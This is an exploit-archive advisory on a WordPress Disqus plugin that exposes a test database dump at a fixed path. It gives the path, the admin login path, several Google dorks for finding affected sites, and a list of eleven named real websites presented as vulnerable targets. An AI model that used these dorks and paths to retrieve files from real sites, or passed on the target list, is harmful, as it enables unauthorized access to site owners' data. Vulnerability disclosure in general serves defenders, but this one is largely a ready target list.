WordPress Disqus Comment System 2.87 Database Disclosure

`#################################################################################################  
  
# Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database  
Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 08/12/2018  
# Vendor Homepage : disqus.com ~  
wordpress.org/plugins/disqus-comment-system/  
# Software Download Link :  
github.com/clearhead/clearhead.me/archive/master.zip  
+  
github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 2.87 and 3.0  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''  
intext:''Greyzed Theme created by The Forge Web Creations. Powered by  
WordPress.''  
intext:''A(c) 2008 - 2018 Grazitti Interactive. All rights reserved''  
intext:''HyTrade Marketing & ComunicaASSAPSo A(c) 2017 | Todos direitos  
reservados''  
intext:''A(c) 2018 Chainbit, LLC. All rights reserved''  
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''  
intext:''A(c) 2017 Longlife Magazine - All Rights Reserved.''  
intext:''A(c) Copyright Feira Cultural 2017. Todos os direitos reservado''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
-- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)  
--  
-- Host: localhost Database: wordpress  
-- ------------------------------------------------------  
-- Server version 5.1.48  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
[+]  
feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`